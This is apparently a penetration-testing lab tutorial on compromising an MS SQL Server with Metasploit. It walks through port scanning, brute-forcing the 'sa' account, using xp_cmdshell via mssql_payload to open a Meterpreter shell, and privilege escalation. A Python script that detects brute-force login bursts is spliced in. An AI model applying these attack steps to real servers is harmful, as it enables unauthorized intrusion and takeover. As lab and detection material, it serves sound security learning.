Aloha,
Let's see how we can use the Metasploit framework to pwn an MS SQL Server.
Our Lab:
A MacBook with VMware Fusion on it
Target: A virtual guest running Windows 2003 Server with the IP address 172.16.226.131
Attacker: A virtual guest running BackTrack 5 R1 with the IP address 172.16.226.128
So let's go...
Commands:
- nmap -O target
The scan shows the SQL Server database listening on TCP port 1433.
- mssql_ping
Setting the RHOSTS option, we can get information about the database, including the version, server name, etc.
- mssql_login
Setting the options RHOSTS, PASS_FILE and VERBOSE, we can brute-force the target for valid credentials. If the server is misconfigured or the passwords are weak, we can find accounts that we can use in the next command. Here I am attacking the "sa" account. The "sa" account is the DBO (db_owner) for all databases created on the server; the account has administrative privileges on the database.
[+] 172.16.226.131:1433 - MSSQL - successful login 'sa' : 'password'
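A defender-side complement to the brute-force step above (an added example, not code from the original post): a small Python detector that walks SQL Server ERRORLOG login-audit lines, flags a burst of failed logins for one account from one client, and raises a stronger alert when a success follows that burst. The log lines are constructed; the threshold and window are arbitrary choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in the shape of the SQL Server ERRORLOG when login
# auditing records both failed and successful logins (not from the original post).
SAMPLE_LOG = """\
2012-03-10 21:15:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.226.128]
2012-03-10 21:15:01.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.226.128]
2012-03-10 21:15:01.50 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.226.128]
2012-03-10 21:15:01.70 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.226.128]
2012-03-10 21:15:01.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.226.128]
2012-03-10 21:15:02.10 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 172.16.226.128]
2012-03-10 21:40:00.00 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for (client, user) pairs with >= threshold failed logins
    inside `window`, plus a stronger alert when a success follows such a burst."""
    failures = defaultdict(deque)   # (client, user) -> recent failure timestamps
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # other ERRORLOG lines (startup, errors, ...)
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        key = (m["client"], m["user"])
        recent = failures[key]
        while recent and ts - recent[0] > window:
            recent.popleft()         # keep only failures inside the window
        if m["result"] == "failed":
            recent.append(ts)
            if len(recent) == threshold:   # fire once when the burst reaches the threshold
                alerts.append(("bruteforce", m["client"], m["user"], len(recent)))
        elif len(recent) >= threshold:
            # success right after a burst of failures: the password was guessed
            alerts.append(("guessed-credential", m["client"], m["user"], len(recent)))
            recent.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Login auditing for successful logins is off by default in SQL Server, so the "guessed-credential" alert only fires where both outcomes are logged.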
- mssql_payload
Setting the options RHOSTS and PASSWORD, using the values found by the previous command, we can try to exploit the server. The exploit uses the "xp_cmdshell" stored procedure to execute commands on the server.
[*] Meterpreter session 1 opened
- getsystem
I am working on a new post about meterpreter, so stay tuned...